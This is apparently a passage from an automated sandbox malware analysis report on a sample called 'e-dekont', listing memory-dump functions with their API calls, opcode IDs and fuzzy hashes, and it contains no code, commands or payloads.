                                                        • Instruction Fuzzy Hash: 6E116AB18002499FCB10DFA9C844BDEFFF5EF88324F148419D559A7250C7359550CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0761553A Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ResumeThread.KERNELBASE(00000004), ref: 076155A2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: e60e47bc68c69f7c1bade9f84f737c058a5363385856c981d9e5d13eb22b9f6e
                                                        • Instruction ID: 1e52a07e2923e158b1a2158b1e2dd7b7777905182a3cc689e0a23c2c8d4412d9
                                                        • Opcode Fuzzy Hash: e60e47bc68c69f7c1bade9f84f737c058a5363385856c981d9e5d13eb22b9f6e
                                                        • Instruction Fuzzy Hash: 4C1158B19002488FDB10DFAAC4487DEFBF5AF88324F24842AD45AA7250C635A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07615540 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ResumeThread.KERNELBASE(00000004), ref: 076155A2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: bdcd4c6ade21a9df428f0e017e45e79660aab24304330d003255bff8f6465529
                                                        • Instruction ID: 14b7c9704d912a6bde365323588d95e730b33996ec81ac81dc9221a8cdb9e3ed
                                                        • Opcode Fuzzy Hash: bdcd4c6ade21a9df428f0e017e45e79660aab24304330d003255bff8f6465529
                                                        • Instruction Fuzzy Hash: EB113AB1D002498FCB10DFAAC4497DEFBF5EF88324F248419D45AA7250C775A544CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0295AFB0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0295B016
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 9c2630f7c0927ec34d856a37cab0a0a8fcde9686349e09c22e0853dd5828f569
                                                        • Instruction ID: 764adba90273aab6a806fe2c332413c849bda954e24b537a9e3d5b38b31d3483
                                                        • Opcode Fuzzy Hash: 9c2630f7c0927ec34d856a37cab0a0a8fcde9686349e09c22e0853dd5828f569
                                                        • Instruction Fuzzy Hash: C71102B6D003598FCB20DF9AC444ADEFBF4AF49324F10842AD869A7210C375A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07618048 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076180AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: b1d0d4188bb08f7f8b0998e02a4650ed870141d8031982edf7591cb52580e593
                                                        • Instruction ID: 67904d73fab7d10ed790c202dab2d454f7ea79dad8ab5d61662d0824ee4b8f3d
                                                        • Opcode Fuzzy Hash: b1d0d4188bb08f7f8b0998e02a4650ed870141d8031982edf7591cb52580e593
                                                        • Instruction Fuzzy Hash: B21103B58003499FDB10DF9AC849BDEBBF8EB48324F14841AE559A7310C375AA84CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07614038 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076180AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 4eea92285e602ee37bacdee26665c5e566e53df1c9b60bad3ce99ef6aca82609
                                                        • Instruction ID: c6f25d89879f08c71ad66972ceac611d2f9b16a98d480568c5a4fa42694ee913
                                                        • Opcode Fuzzy Hash: 4eea92285e602ee37bacdee26665c5e566e53df1c9b60bad3ce99ef6aca82609
                                                        • Instruction Fuzzy Hash: E91122B58003499FDB20DF9AC848BDEBBF8EB48320F10841AE559A7210C375A980CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F7714 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: e1a3a6c348cd176266ef78e3f03d0be3a2c4a5baa08eab39f5c764e44a08ebef
                                                        • Instruction ID: 5ef9c4e3e3c0d30c39401486e382f71d379bb1d521a72fd4e6eef22110e169fb
                                                        • Opcode Fuzzy Hash: e1a3a6c348cd176266ef78e3f03d0be3a2c4a5baa08eab39f5c764e44a08ebef
                                                        • Instruction Fuzzy Hash: 7051BE70B002068FDB15DF79884896EBBF6EFC4360714892AE429DB395EB30DD0587A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F727F Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: O};5
                                                        • API String ID: 0-3558557551
                                                        • Opcode ID: 1b56a7efe16fe2c8470d468330aae912952aa549d588193b2a0eba9f4053b08f
                                                        • Instruction ID: 06960bcea7cbd161a947d18acb11a4b98f1d29d1b321f0988af3f6ced427a075
                                                        • Opcode Fuzzy Hash: 1b56a7efe16fe2c8470d468330aae912952aa549d588193b2a0eba9f4053b08f
                                                        • Instruction Fuzzy Hash: 3D418DB0A10209EFDB44CF99D98449DBFF2FB89250FE4D895D009E7764D3359A61CB10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F7290 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: O};5
                                                        • API String ID: 0-3558557551
                                                        • Opcode ID: 9f9d061fd0f4109a93533c4940382febace4d0f98b0b5c55482c3d1742dcb7ea
                                                        • Instruction ID: 6c908eea88d80a310bcfcc70f2e4d4238c97414e16fbec0f17d3c1cedb67c3bb
                                                        • Opcode Fuzzy Hash: 9f9d061fd0f4109a93533c4940382febace4d0f98b0b5c55482c3d1742dcb7ea
                                                        • Instruction Fuzzy Hash: 8B418DB0A14209EFDB44CF95D9858AEBBF2FB89340FE0D895D009A7364D734AA60CB14
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F9598 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: 2ae8d49f66b6ed9f02ad4be73e77be7f1f0de3ab53f49055f9cacce3cb5be484
                                                        • Instruction ID: f877b0d38320caac92f58357f7ba4f0b9fa1d10e5431e6354f81554f7efa11e5
                                                        • Opcode Fuzzy Hash: 2ae8d49f66b6ed9f02ad4be73e77be7f1f0de3ab53f49055f9cacce3cb5be484
                                                        • Instruction Fuzzy Hash: 2D115EB1B0021A8BDB14EBB999006EFB7F6ABD4250B50006AC509E7344EF359E06CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FC110 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: B!p
                                                        • API String ID: 0-1355146339
                                                        • Opcode ID: b533b1556187412b07be9f2a623912a7e93b74fa805edb4ed5269702e609e327
                                                        • Instruction ID: 63b29ab91b38575992d9224bddfafde5aaac94e21e8afa88b0279024fdd19c74
                                                        • Opcode Fuzzy Hash: b533b1556187412b07be9f2a623912a7e93b74fa805edb4ed5269702e609e327
                                                        • Instruction Fuzzy Hash: CBD0127715010D9EAB40EE94E800C56B7DDBB14750700C422F64CC7021E621E434D761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FB94A Relevance: .2, Instructions: 175COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d156ea227940a88423b592c45b6c898e890809c0ea786ad2fce0d7d42af6179c
                                                        • Instruction ID: b39b76a8310cabd4334fbd9ab2924caaae144ffe6da23981c6d2d3cf8b8367f3
                                                        • Opcode Fuzzy Hash: d156ea227940a88423b592c45b6c898e890809c0ea786ad2fce0d7d42af6179c
                                                        • Instruction Fuzzy Hash: CC61C1F0A44115DFE708CBB9D855BBEBAF2AB84340F148066E6999B2D9C738C942CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F1807 Relevance: .2, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ab242d56d42400258f6dfca79dba41543febcdf6578301032b93174b1ae6b948
                                                        • Instruction ID: 5aa86449458d5d45560c116684170a53bca21b4f5abb5a5b58d1041862e1c074
                                                        • Opcode Fuzzy Hash: ab242d56d42400258f6dfca79dba41543febcdf6578301032b93174b1ae6b948
                                                        • Instruction Fuzzy Hash: D25122F5A1411DCBE7008F69E9402BEF7B6FB45394F14826AEA6EDB680C738D940CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F7128 Relevance: .1, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4fe3f0cea2f68ed5fe45f84fa80ecf0cca6eb1ef0cb975e978a2cba4ac9d91d8
                                                        • Instruction ID: 56db64764f77002a7002f6dc00e1953a4c71dc1d204c6bb3225eb56d6f60b6e3
                                                        • Opcode Fuzzy Hash: 4fe3f0cea2f68ed5fe45f84fa80ecf0cca6eb1ef0cb975e978a2cba4ac9d91d8
                                                        • Instruction Fuzzy Hash: 73419DB4909784DFC70ADBA9D450988BFF1EF8A211F8A84D6C484DB3B3D7349995CB12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F7409 Relevance: .1, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a62bc6d1157cc08c7000a41c3439acb6d1e440205217ac0f33ecd48afee7d28a
                                                        • Instruction ID: 10688259e4565506e816502f47b8e59bd86536dc6a0c3905d57f58ffa3d996f5
                                                        • Opcode Fuzzy Hash: a62bc6d1157cc08c7000a41c3439acb6d1e440205217ac0f33ecd48afee7d28a
                                                        • Instruction Fuzzy Hash: 4041AAB4E0021ADFCB04CF95D8419EEBBB2FF89350F14952AD508AB364D7749A55CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F7AB4 Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1409c0203208d00e4b2cd952fa317cce5723cb9c1b07259c5f1cffa33dfdad90
                                                        • Instruction ID: c93b9d7e728d6f4a73497e1e227d066281906d9326a4ff7c3f42e0a9bd60aa58
                                                        • Opcode Fuzzy Hash: 1409c0203208d00e4b2cd952fa317cce5723cb9c1b07259c5f1cffa33dfdad90
                                                        • Instruction Fuzzy Hash: 113168B1900209EFDB14DFA9D844A9EBFF9EF49350F10842AE919A7310D734A980CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FC8D0 Relevance: .1, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f5be033725307b5030cc3788abf3edf5b098360dc11a332c3f409058800b5e40
                                                        • Instruction ID: 27c35d2977af213693c8938034055e95b95e22f15b13d00d8e729dc05f7550a4
                                                        • Opcode Fuzzy Hash: f5be033725307b5030cc3788abf3edf5b098360dc11a332c3f409058800b5e40
                                                        • Instruction Fuzzy Hash: 353103F0E9415ECEDB008F79C80027BB7B5BB46290F04966BE67AC66A1E334D450CB75
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FC780 Relevance: .1, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 92a23eb9b4be80fd53758bc97a4711f183e5644166f610c395d7c788b6d67760
                                                        • Instruction ID: c74a415a4d289ff76c2f4245a05ceaa6f8a2e1ff6f460606b235b367f50a9ddc
                                                        • Opcode Fuzzy Hash: 92a23eb9b4be80fd53758bc97a4711f183e5644166f610c395d7c788b6d67760
                                                        • Instruction Fuzzy Hash: 8B310AB0F84209DFF7148A15C819B257BA7BBC5755F58C0B9E11D4F6D2CB768845CB20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FC771 Relevance: .1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 45778e22268ea194ce1fd90a481d3e6f8c9de59a6e5d677f23f43a3c910f3754
                                                        • Instruction ID: 66b43f021f268c6e893ba3109673602cfab8c646ebe0442e5bc251548a48ffe8
                                                        • Opcode Fuzzy Hash: 45778e22268ea194ce1fd90a481d3e6f8c9de59a6e5d677f23f43a3c910f3754
                                                        • Instruction Fuzzy Hash: B531E3B4F84205DFF3148A14C805B697BA6BB86755F5880BAE21D4F6D2CB768806CB20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F1996 Relevance: .1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 159425181ff8fc3379de17ccee12c95c588aea2da72a5d45674fced3662eec74
                                                        • Instruction ID: 6910969a1f75dea8cab9f485756207f51f7b7b265e4af802ca5cb93f67e966c8
                                                        • Opcode Fuzzy Hash: 159425181ff8fc3379de17ccee12c95c588aea2da72a5d45674fced3662eec74
                                                        • Instruction Fuzzy Hash: 1E31E5F1D1611ACAEB148F5AE90037BB7B7EB41380F04826BE66D8B785C3398551CBD1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00DDD43C Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1659615917.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_ddd000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b6c79ff21a5cb3bfa2ea3360c049a11c8767dda5f399461eb91965e4de3d7968
                                                        • Instruction ID: 4845dff6207055a721cdc9f55bfc56e028f50352e3b0e46de6075c56668fd2e9
                                                        • Opcode Fuzzy Hash: b6c79ff21a5cb3bfa2ea3360c049a11c8767dda5f399461eb91965e4de3d7968
                                                        • Instruction Fuzzy Hash: EA21FF71540200EFCF05DF14DAC0B26BF66FB98324F24C56AE8094B356C336E85ACAB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00DED1B4 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1659667959.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_ded000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 84854f717fd03e5bcf2b67bc2913f4f7ab0ea670d41fc0d176be28a001ae9f8e
                                                        • Instruction ID: b1be982bc9aefe5a28eb17410c081e01a7b568349e2fb092d1336a161f9bcfed
                                                        • Opcode Fuzzy Hash: 84854f717fd03e5bcf2b67bc2913f4f7ab0ea670d41fc0d176be28a001ae9f8e
                                                        • Instruction Fuzzy Hash: 3A212675604380DFCB05EF15C5C0B2ABBA6FB84314F24C56DE9494B296CB36D846CA75
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00DED36C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1659667959.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_ded000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11dbabe2f954e60e622b356c7bdc36c92587b8a308c3b68e5b94bb340ae9eb48
                                                        • Instruction ID: a514f1d14f45e07ea96be624c39d5c8d96889ec036224d2b22c72e522c736751
                                                        • Opcode Fuzzy Hash: 11dbabe2f954e60e622b356c7bdc36c92587b8a308c3b68e5b94bb340ae9eb48
                                                        • Instruction Fuzzy Hash: F2214675500384DFCB00EF14D5C4B26BBA6FB94314F24C56DE8494F296CB36D846CA72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F1CB8 Relevance: .1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1389aa4f7d8c97329dcdbeec8f46600ac17a2e2dec5d80813927b0531941c958
                                                        • Instruction ID: 2573644189f6fd47f3e857937b66d4ebf4ec8aaf7905bc1ff01dfd3af585fc6f
                                                        • Opcode Fuzzy Hash: 1389aa4f7d8c97329dcdbeec8f46600ac17a2e2dec5d80813927b0531941c958
                                                        • Instruction Fuzzy Hash: AD21D5F1A1856DCBE3014FA9E84027ABB78FB06390F004137F3A9DB681D3749950C792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F981D Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8aadf95f9b44c278fe924192a64a825484f1cec154d1dbc416f4c94e105389a9
                                                        • Instruction ID: 3f7459155c3e1213fb823a595479dc886be98935bce1a562de6f1a2c47257bed
                                                        • Opcode Fuzzy Hash: 8aadf95f9b44c278fe924192a64a825484f1cec154d1dbc416f4c94e105389a9
                                                        • Instruction Fuzzy Hash: A831E2B0D01258DFDB20CF99C988BCEBFF4AB49314F14805AE508BB250C7756984CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FABC0 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f9b9ba1f33899c2ee85a50c95ac25bc2e123bfaf7720b5e716384ed282e99c1
                                                        • Instruction ID: fd455471a704f1d62be68bc27b4ce43245b717cc3f6d30251b2d1f7f8301a083
                                                        • Opcode Fuzzy Hash: 9f9b9ba1f33899c2ee85a50c95ac25bc2e123bfaf7720b5e716384ed282e99c1
                                                        • Instruction Fuzzy Hash: D011C47460A3C4EFDB07CB749C168AE7FF4AF4610071545DBE948C7252EA349E15D362
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F78B4 Relevance: .1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c5f3d13c8d19e35c8c6a9963e25d0292604765825565e768be3204f0feee00d2
                                                        • Instruction ID: e63ec185d687af8f308fc5ffe12dc30e9fdace4ea6791a09e3c1ab83b4a5ee2d
                                                        • Opcode Fuzzy Hash: c5f3d13c8d19e35c8c6a9963e25d0292604765825565e768be3204f0feee00d2
                                                        • Instruction Fuzzy Hash: 4D31E3B0D01218EFDB20DF99C588B8EBBF4FB08754F24806AE508BB250C7B56885CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F71B8 Relevance: .1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 785f59a4d233da17ae6f9c77ca24bb59a0c4910e5e46a2cea99e4cf7c257e207
                                                        • Instruction ID: 75bb1e651b97625e8a8da3cdf418de16e1bcc6dec65a2ce67d53845eb838f5d7
                                                        • Opcode Fuzzy Hash: 785f59a4d233da17ae6f9c77ca24bb59a0c4910e5e46a2cea99e4cf7c257e207
                                                        • Instruction Fuzzy Hash: 5D217574A10608DFD748DF5AE085999BFF2FF8C310F9280D5D4489B365D735AAA5CB01
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F9668 Relevance: .1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7ea81941d217321558434d87cdcc1a364a7ff86a231d0f3f5e0e24a3f2cce5c8
                                                        • Instruction ID: 3cd46706fabab74eca51b977921bbcd439827eb5332b803e300a912d923fd2b8
                                                        • Opcode Fuzzy Hash: 7ea81941d217321558434d87cdcc1a364a7ff86a231d0f3f5e0e24a3f2cce5c8
                                                        • Instruction Fuzzy Hash: 0711A3B5A003068FAB15DF799C516BFBBF6EFC4260354452AD52CD7380EF30990587A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FFA68 Relevance: .1, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4f4cff0a6a6bcbb85b4ec3d9999552f83e54010ccd28235c4e93f5eb621befa1
                                                        • Instruction ID: 60a14942291a0d362a4eebce19e82549f9fc9baa426c9eb5e0ef93dd9d742c23
                                                        • Opcode Fuzzy Hash: 4f4cff0a6a6bcbb85b4ec3d9999552f83e54010ccd28235c4e93f5eb621befa1
                                                        • Instruction Fuzzy Hash: 252108F4E0520ADFCB44CF99C1819AEBBF9EF49340F60A095D909A7751D370AA40CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00DDD437 Relevance: .1, Instructions: 56COMMON
